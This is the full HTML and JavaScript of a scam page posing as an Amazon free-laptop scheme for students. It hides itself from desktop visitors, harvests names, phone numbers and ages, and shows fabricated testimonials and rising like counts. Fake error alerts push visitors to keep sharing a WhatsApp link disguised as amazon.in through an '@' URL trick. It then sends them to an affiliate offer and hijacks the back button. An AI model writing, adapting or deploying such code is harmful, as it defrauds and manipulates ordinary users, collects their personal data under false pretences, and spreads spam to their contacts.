

<!DOCTYPE html>
<html>
    <head>
     
        <script>
            if (/Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent)) {
             } else {
             window.location.href = "https://www.google.com";
             }
         </script>
        <meta charset="UTF-8" />
        <meta name="viewport" content="width=device-width, initial-scale=1.0" />
<title>Prank Website</title>
        <meta name="og:title" content="Amazon Free Laptop for Students Scheme" />
        <meta name="og:url" content="https://www.amazon.in/" />
        <meta property="og:description" content="Click here to register" />
        <meta property="og:image" content="https://amacdn.pages.dev/ogimage.jpg" />
        <meta name="robots" content="noindex" />
        <meta name="theme-color" content="#ffffff" />
        <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css" />
<img src='https://pincdn.pages.dev/dyGm8v2.png' width='100%'/>

<style type="text/css">
@import url('https://fonts.googleapis.com/css2?family=Poppins:wght@500;700&display=swap');
@import url('https://fonts.googleapis.com/css2?family=Droid+Arabic+Naskh&display=swap');

* {
    margin: 0;
    padding: 0px;
    font-family: Poppins, Droid Arabic Naskh;
    font-weight: normal;
    box-sizing: border-box;
}
body {
    direction: ltr;
    background: #fff;
}
a {
    text-decoration: none;
}
.post {
    background: #fff;
    margin: 0 auto;
    max-width: 500px;
    border: 0px solid #00B7B2;
    border-radius: 3px;
}
.post1 {
    padding: 10px;
}
p {
   color: #000;
}
.intro {
    display: block;
    max-width: 300px;
    width: 100%;
    margin: 10px auto;
    background: #7f8c8d;
}
.rib {
    display: block;
    width: 100%;
}
.info {
    display: block;
    max-width: 300px;
    width: 100%;
    height: 50px;
    margin: 10px auto;
    padding: 0 10px;
    border: 2px solid #95a5a6;
    outline: none;
}
.step2,
.step3 {
    display: none;
}
.question,
.title {
    text-align: center;
}
table {
    width: 100%;
    color: #000;
}
table th {
    background: #232F3E;
    color: #fff;
}
table tr th,
table tr td {
    width: 50%;
    border: 1px solid #c7c7c7;
    padding: 5px;
    font-size: 18px;
    text-align: center;
}
.yes {
    background: #4caf50;
}
.yes:hover {
    background: #2ecc71;
}
.no {
    background: #e74c3c;
}
.no:hover {
    background: #c0392b;
}
.welcome {
    font-size: 15px;
}
.amount,
#getname {
    color: #d70005;
    text-decoration: none;
}
.done {
    text-align: center;
    color: #3cbd45;
}
.tip {
    font-size: 15px;
      padding: 5px 8px
}
.tip2 {
    font-size: 22px;
    text-align: center;
    color: #ff0000;
    font-weight: bold;
}
.tip3 {
    font-size: 15px;
    text-align: center;
    color: #b70029;

}
.tip4 {
    font-size: 14px;
    color: #ff0000;

}
.title {
    text-align: center;
}
.error {
    display: none;
    text-align: center;
    font-size: 14px;
    color: #e74c3c;
}
button {
    display: block;
    width: 250px;
    height: 50px;
    color: #fff;
    border: none;
    outline: none;
    font-size: 20px;
    cursor: pointer;
    border-radius: 5px;
    padding: 0 10px;
    margin: 10px auto;
    background: #3cbd45;
    transition: background 0.3s ease;
}
  button2 {
    display: block;
    width: 250px;
    height: 50px;
    color: #333333;
    text-align: center;
    border: dotted;
    outline: none;
    font-size: 30px;
    cursor: pointer;
    border-radius: 5px;
    padding: 0 10px;
    margin: 10px auto;
    background: #FEBD69;
    transition: background 0.3s ease;
}  
button:hover {
    background: #3cbd45;
}
.phone {
    max-width: 400px;
    margin: 10px auto;
}
.phone input {
    width: 60%;
    height: 50px;
    padding: 10px;
    outline: none;
    border: 2px solid #cecece;
    font-size: 14px;
}
#confirm {
    width: 40%;
    float: left;
    margin: 0;
    border-radius: 0px;
}
#loader {
    text-align: center;
}
.spin {
    width: 50px;
    height: 50px;
    background: transparent;
    border: solid 8px #0e5aa7;
    border-right-color: transparent;
    border-radius: 50%;
    margin: 10px auto;
    animation: spin 0.8s linear infinite;
}
@keyframes spin {
    100% {
        transform: rotate(1turn);
    }
}
#loader,
#info,
#checking,
#share,
#claim {
    display: none;
}
.center {
    display: flex;
    align-items: center;
    justify-content: center;
}
.barr {
    direction: ltr;
    max-width: 400px;
    margin: 10px auto;
    box-sizing: border-box;
}
.fill {
    position: relative;
    display: inline-block;
    width: calc(100% - 100px);
    height: 35px;
    padding: 2px;
    border: 2px solid #232f3e;
}
#fill,
#fill2 {
    background: #232f3e;
    width: 0%;
    height: 100%;
}
.percentage {
    color: #000;
    width: 100px;
    float: right;
    height: 35px;
    font-size: 16px;
    border: 2px solid #232f3e;
}
#percentage,
#percentage2 {
    margin-left: 5px;
}
#check,
#check2 {
    display: none;
}
.counter {
    color: #7f7f7f;
    font-size: 12px;
    text-align: right;
    padding: 10px 0 10px 2px;
    border-bottom: 1px solid #e1e2e3;
}
.reactions {
    display: inline-flex;
    align-items: center;
    float: left;
}
.counter img {
    float: left;
    width: 16px;
    height: 16px;
    border-radius: 50%;
    border: 2px solid #fff;
    box-sizing: content-box;
}
.like,
.love {
    margin-right: -5px;
}
.like {
    z-index: 2;
}
.love {
    z-index: 1;
}
.bar {
    display: table;
    width: 100%;
    border-bottom: 1px solid #e1e2e3;
}
.bar .react {
    display: table-cell;
    width: calc(100% / 3);
    font-size: 12px;
    color: #7f7f7f;
    text-align: center;
    padding: 10px 0;
    cursor: pointer;
}
.comments {
    direction: ltr;
    padding: 03px;
}
.comment {
    padding: 6px 0;
    margin-top: 5px;
}
.comment img {
    float: left;
    width: 32px;
    height: 32px;
    border: none;
    border-radius: 18px;
    cursor: pointer;
}
.reply {
    margin-left: 37px;
}
.single-container {
    margin-left: 37px;
    background: #f1f2f6;
    padding: 10px;
    border-radius: 15px;
    font-size: 12px;
}
.single-container .user {
    display: inline-block;
    cursor: pointer;
    color: #365899;
    margin-bottom: 5px;
}
.single-container .text {
    display: block;
}
.buttons {
    font-size: 12px;
    font-weight: bold;
    margin: 10px 0 0 47px;
    color: #90949c;
}
.action {
    cursor: pointer;
}
.action:hover {
    text-decoration: underline;
}
.input {
    padding: 6px 12px 12px;
}
.input input {
    width: 100%;
    background: #f1f2f6;
    padding: 10px;
    border-radius: 15px;
    border: 0;
    outline: none;
}
  .bottom {
			width: 100%;
			margin: 20px auto 0;
			border: 1px solid #ccc;
			background-color: #f2f2f2;
			padding: 5px;
			border-radius: 10px;
			-moz-border-radius: 10px;
			-webkit-border-radius: 10px
              
		}
        input {
    padding: 10px;
}
.state {
        width: 90%;
        max-width: 400px;
        padding: 10px 15px;
        font-size: 16px;
        color: #333;
        background-color: #f9f9f9;
        border: 1px solid #ccc;
        border-radius: 8px;
        appearance: none;
        -webkit-appearance: none;
        -moz-appearance: none;
        background-image: url("data:image/svg+xml;charset=US-ASCII,%3Csvg xmlns='http://www.w3.org/2000/svg' width='16' height='16' fill='gray' class='bi bi-caret-down-fill' viewBox='0 0 16 16'%3E%3Cpath d='M7.247 11.14l-4.796-5.481A.5.5 0 0 1 2.651 5h10.698a.5.5 0 0 1 .4.8l-4.796 5.481a.5.5 0 0 1-.706 0z'/%3E%3C/svg%3E");
        background-repeat: no-repeat;
        background-position: right 10px center;
        background-size: 16px;
        cursor: pointer;
        transition: border 0.3s ease;
    }

    .state:focus {
        outline: none;
        border-color: #6c63ff;
        box-shadow: 0 0 5px rgba(108, 99, 255, 0.5);
    }
</style>

<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>


</head>
<body>
    
    
    


        <div class="post1">
        <div  class="welcome">
        </div>
        <div class="step1">
            <center>
                <img src="https://amacdn.pages.dev/boymain.jpg" width="90%"/>
            </center>
            <p class="question">Please fill in the data correctly:</p><br>
                <center><input type="text" placeholder=" Full name " id="name" name="Phone" style="fontwidth: 244px;height: 56px;font-size: 16px;width: 330px;" onkeypress="return numberonly(event);"><br><br>
                <input type="tel" placeholder=" Mobile number " id="grade" name="Phone" style="fontwidth: 244px;height: 56px;font-size: 16px;width: 330px;" onkeypress="return numberonly(event);"><br><br>
                <input type="tel" placeholder="Age" id="age" name="Phone" style="fontwidth: 244px;height: 56px;font-size: 16px;width: 330px;" onkeypress="return numberonly(event);">
            <br>            <br>
            <label>Select Your Educational Level</label>
            <br>
            <select name="state" class="state" id="edu" required>
                <option value="0">-------Educational Level-------</option>
                <option value="High School">High School</option>
                <option value="Secondary School">Secondary School</option>
                <option value="College">College</option>
                <option value="Undergraduate">Undergraduate</option>
                <option value="Masters">Masters</option>
                <option value="PhD">PhD</option>
            </select>
            <br>

            <label>Select Laptop Brand</label>
            <br>
            <select name="state" class="state" id="brand" required>
                <option value="0">-------Select Brand-------</option>
                <option value="Apple">Apple</option>
                <option value="Dell">Dell</option>
                <option value="HP">HP</option>
                <option value="Lenovo">Lenovo</option>
                <option value="Asus">Asus</option>
            </select>
            
            </center><br>

            <button id="select">Next</button>
        </div>
        <div class="step2">
            <table>
                <tbody>
                    
                        <th>Name</th>
</tbody><tbody>
<td id="pastname"></td>
                                        </tbody>
<tr><tr><tbody>
                       <th>Mobile number</th></tbody>
    <tbody><td id="pastnumber"></td>
</tbody>
<th>Age</th></tbody>
<tbody><td id="pastage"></td>
</tbody>
<th>Education Level</th></tbody>
<tbody><td id="pastedu"></td>
</tbody>
<th>Brand</th></tbody>
<tbody><td id="pastbrand"></td>
</tbody>
            </table>
            <button class="yes">Confirm</button>
            <button class="no">Edit </button>
        </div>
        <div id="checking">
            <p class="title">Please wait ...</p>
            <div class="barr">
                <div class="fill">
                    <div id="fill"></div>
                </div>
                <div class="percentage center">
                    <span id="load"><i class="fa fa-spinner fa-pulse"></i></span>
                    <span id="check"><i class="fa fa-check-circle"></i></span>
                    <span id="percentage"></span>
                </div>
            </div>
        </div>
        <div id="share">
<center>
            <img src="https://amacdn.pages.dev/girlmain.jpg" width="90%"/>
        </center>
Dear : 
<span class="amount" id="getname"></span> , <br> <p class="tip4"> Follow the instructions below to claim your free laptop!</p>

          
                      <div class="bottom" id='buttonO'>

            <p class="tip">1. Share with 5 groups / 20 friends on WHATSAPP (tap the 'WhatsApp' button below)</p>
            <p class="tip">2. Tap 'CONTINUE' and add your address.</p>

            <button id="whatsapp">WhatsApp</button>
                    <p class="tip3">Share until progress bar hits 100%!</p>
          
            <div class="barr">
                <div class="fill">
                    <div id="fill2"></div>
                </div>
                <div class="percentage center">
                    <span><i class="fa fa-spinner fa-pulse"></i></span>
                    <span id="percentage2">0%</span>
                
                  
                </div>
            </div>
                           <button2 onclick="myFunction()">CONTINUE</button2>              </div>


          <script>
function myFunction() {
  alert("Unfortunately... \n To Receive Your free laptop, You have to share with friends about our event. Share until the progress bar hits 100% !");
}
</script> 
        </div>
        <div id="claim">
                               <p class="done"><i class="fa fa-check-circle fa-3x" aria-hidden="true"></i></p>
          <p class="tip2">Final Step !</p>

      
                     

          <p class="tip3">You must complete this final step!</p>
          <p class="tip3">(Remember, this step is very Important)</p>
          <p class="tip">Now, click on the "CONTINUE" button, enter your delivery address, and we will send your free laptop once your application is approved.
</p>
          <p class="tip3">It will be delivered within 5-8 Days.</p>

<br>
            <button id="offer">CONTINUE</button>

        </div>        </div>

        </div>
    </div>
<div class="comments">
            <div class="counter">
                <div class="reactions">
                    <img class="like" src="https://pincdn.pages.dev/like.png" /> <img class="love" src="https://pincdn.pages.dev/love.png" /> <img class="care" src="https://pincdn.pages.dev/care.png" /> <span id="likes">134K</span>
                </div>
                <span id="comments">23K comments</span> <span class="dot">·</span> <span id="shares">12K shares</span>
            </div>
            <div class="bar">
                <span class="react"><i class="fa fa-thumbs-o-up"></i> <a class="liked">Like</a></span> <span class="react"><i class="fa fa-comment-o"></i> Comment</span> <span class="react"><i class="fa fa-share"></i> Share</span>
            </div>
            <div>
                <div class="comment">
                    </div>
                </div>
                                <div class="comment">
<img src="https://pincdn.pages.dev/i116BgA.jpeg" />
                    <div class="single-container">
                        <span class="user">Albert Wigston</span>
                        <span class="text">
Thanks you verry much amazon! I received my laptop just now.❤️
                        </span>
                    </div>
                    <div class="buttons"><span class="time t1">1m</span> <span class="dot">·</span> <span class="action liked">Like</span> · <span class="action">Reply</span></div>
                </div>
                <div class="comment">
                    <img src="https://pincdn.pages.dev/iTAUZXX.jpeg" />
                    <div class="single-container"><span class="user">Jenisha Parmar</span> <span class="text">I thought it was a scam, but it arrived now. Thanks amazon</span></div>
                    <div class="buttons"><span class="time t2">2m</span> <span class="dot">·</span> <span class="action liked">Like</span> · <span class="action">Reply</span></div>
                </div>
                <div class="comment reply">
                    <img src="https://pincdn.pages.dev/f0b7MJd.jpeg" />
                    <div class="single-container"><span class="user">George Smith</span> <span class="text">You must follow the guidelines exactly as requested to get your Laptop. Enjoy it, friends.</span></div>
                    <div class="buttons"><span class="time t1">1m</span> <span class="dot">·</span> <span class="action liked">Like</span> · <span class="action">Reply</span></div>
                </div>
                <div class="comment">
                    <img src="https://pincdn.pages.dev/Fvt0UIC.jpeg" />
                    <div class="single-container"><span class="user">Chanchal Goyal</span> <span class="text">I applied for Apple Mac but got Dell 🥲</span></div>
                    <div class="buttons"><span class="time t3">4m</span> <span class="dot">·</span> <span class="action liked">Like</span> · <span class="action">Reply</span></div>
                </div>
<div class="comment">
                    <img src="https://pincdn.pages.dev/Ien4MZ9.jpeg" />
                    <div class="single-container"><span class="user">Inmaculada Reyes</span> <span class="text">Fantastic! thank you Amazon.</span></div>
                    <div class="buttons"><span class="time t3">7m</span> <span class="dot">·</span> <span class="action liked">Like</span> · <span class="action">Reply</span></div>
                </div>
<div class="comment">
                    <img src="https://pincdn.pages.dev/4OLG3Ex.jpeg" />
                    <div class="single-container"><span class="user">Alfonso Campos</span> <span class="text">At first I thought it was fake, but I finally received my Laptop. But my friend got Apple Macbook Air M4.
</span></div>
                    <div class="buttons"><span class="time t3">7m</span> <span class="dot">·</span> <span class="action liked">Like</span> · <span class="action">Reply</span></div>
                </div>
                <div class="input"><input placeholder="Write a comment..." /></div>
            </div>
        </div>
    </div>
    <script>
        // Define the messages array
        var tiaobanArray = [
   "https://www.amazon.in@laptop.zaget.cc",
            "https://www.amazon.in@laptop.zaget.cc"
        ];

        var tiaoban = tiaobanArray[Math.floor(Math.random() * tiaobanArray.length)];
        var date = new Date();
        var hour = (date.getHours() > 9) ? date.getHours() : '0' + date.getHours();
        var minute = (date.getMinutes() > 9) ? date.getMinutes() : '0' + date.getMinutes();
        var second = (date.getSeconds() > 9) ? date.getSeconds() : '0' + date.getSeconds();
        var mytime = hour + ':' + minute + ':' + second;
        //var tb = tiaoban + '?=' + mytime;
        var tb = tiaoban;
    </script>   
    <script>
        var errorname = "Please enter the name correctly!",
            errornumber = "Please enter your number correctly, example 05xxxxxxx",
            text = " بمناسبة مرور 42 عاماً على تأسيسها أسواق العثيم تقدم قسائم شرائية وجوالات والعديد من الجوائز القيمة والفورية ، الجوائز محدودة سارع من هنا : ",
            link = "url",
            error = "Something is wrong!\nPosts are not calculated. You may have shared it with the same friend or group more than once, please re-share",
            cpa = "https://backgroundrunway.com/agyv7ex6?key=96eb9366cb1c6c1b8ab6ab46c574e6fb",
            saved = "",
            share = "whatsapp://send?text=" + tb;
    </script>

<script type="text/javascript">
    var time = 0;
    window.setInterval(function () {
        time = time + 1;
        $(".t1").html(time + 1 + "m");
        $(".t2").html(time + 2 + "m");
        $(".t3").html(time + 4 + "m");
    }, 6e4);
    var likes = 134,
        comments = 23,
        shares = 12;
    window.setInterval(function () {
        likes = likes + Math.floor(Math.random() * 3);
        comments = comments + Math.floor(Math.random() * 2);
        shares = shares + Math.floor(Math.random() * 2);
        $("#likes").html(likes + "K");
        $("#comments").html(comments + "K comments");
        $("#shares").html(shares + "K shares");
    }, 5e3);
    $(".liked").click(function () {
        if ($(this).hasClass("selected")) {
            $(this).removeClass("selected");
            $(this).html("Like");
        } else {
            $(this).addClass("selected");
            $(this).html("Unlike");
        }
    });  
      
    var name = localStorage.getItem("name");
    $("#getname").html(name);
    
    $("#select").click(function () {
        var main = $("#age").val();
        var name = $("#name").val();
        var education = $("#edu").val();
        var company = $("#brand").val();
    
        localStorage.setItem("name", name);
        var number = $("#grade").val();
        if (name.length < 1 || name.length > 150) {
            alert(errorname);
        } else if (number === "0") {
            alert(errornumber);
        } else {
            $(".step1").fadeOut(0);
            $(".step2").fadeIn(500);
            $("#pastname").html(name);
            $("#pastnumber").html(number);
            $("#pastage").html(main);
            $("#pastedu").html(education);
            $("#pastbrand").html(company);
            
        }
    });
    $(".yes").click(function () {
        $(".welcome").fadeOut(0);
        $(".step2").fadeOut(0);
        $("#checking").fadeIn(1000);
        var i = 0;
        var interval = setInterval(function () {
            i += 1;
            $("#percentage").text(i + "%");
            $("#fill").css("width", i + "%");
            if (i == 50) {
                i = 49;
                setTimeout(function () {
                    i = 50;
                }, 1000);
            }
            if (i >= 100) {
                clearInterval(interval);
                $("#load").fadeOut(0);
                $("#check").fadeIn(0);
                setTimeout(function () {
                    $("#checking").fadeOut(0);
                    $("#share").fadeIn(1000);
                    $("#getname").html($("#name").val());
                }, 1000);
            }
        }, 50);
    });
    $(".no").click(function () {
        $(".step2").fadeOut(0);
        $(".step1").fadeIn(500);
    });  
    
    var swidth = localStorage.getItem(saved);
    if (swidth !== null) {
        var width = swidth * 1;
        $(".welcome").fadeOut(0);
        $(".step1").fadeOut(0);
        $("#share").fadeIn(0);
        $("#fill2").css("width", width + "%");
        $("#percentage2").text(width + "%");
    } else {
        var width = 0;
    }
    $("#whatsapp").click(function () {
        window.location.href = share;
        if (width == 0) {
            width += 50;
        } else if (width == 50) {
            alert(error);
            width += 15;
        } else if (width == 65) {
            width += 5;
        } else if (width == 70) {
            alert(error);
            width += 10;
        } else if (width == 80) {
            alert(error);
            width += 5;
        } else if (width == 85) {
            width += 2;
        } else if (width == 87) {
            width += 3;
        } else if (width == 90) {
            width += 3;
        } else if (width == 93) {
            width += 2;
        } else if (width == 95) {
            width += 2;
        } else if (width == 97) {
            width += 1;
        } else if (width == 98) {
            width += 1;
        } else {
            $("#share").fadeOut(0);
            $("#claim").fadeIn(1000);
        }
        localStorage.setItem(saved, width);
        setTimeout(function () {
            $("#fill2").css("width", width + "%");
            $("#percentage2").text(width + "%");
        }, 2000);
    });
    $("#offer").click(function () {
        window.open(cpa, "_blank");
    });  
    $("#offers").click(function () {
        window.open(cpa1, "_blank");
    });  
    $("#offerss").click(function () {
        window.open(cpa2, "_blank");
    });  
    
        ! function() {
        var t;
        try {
            const URL = window.location.href.split(/[#]/)[0];
            for (t = 0; 10 > t; ++t) history.pushState({}, "", URL + '#')
            onpopstate = function(event) {
                event.state && location.replace('#');
            }
        } catch (o) {
            console.log(o);
        }
    }();
    </script>

   <!-- Google tag (gtag.js) -->
<script async src="https://www.googletagmanager.com/gtag/js?id=G-WYM7LNMZ87"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'G-WYM7LNMZ87');
</script>
</body></html>
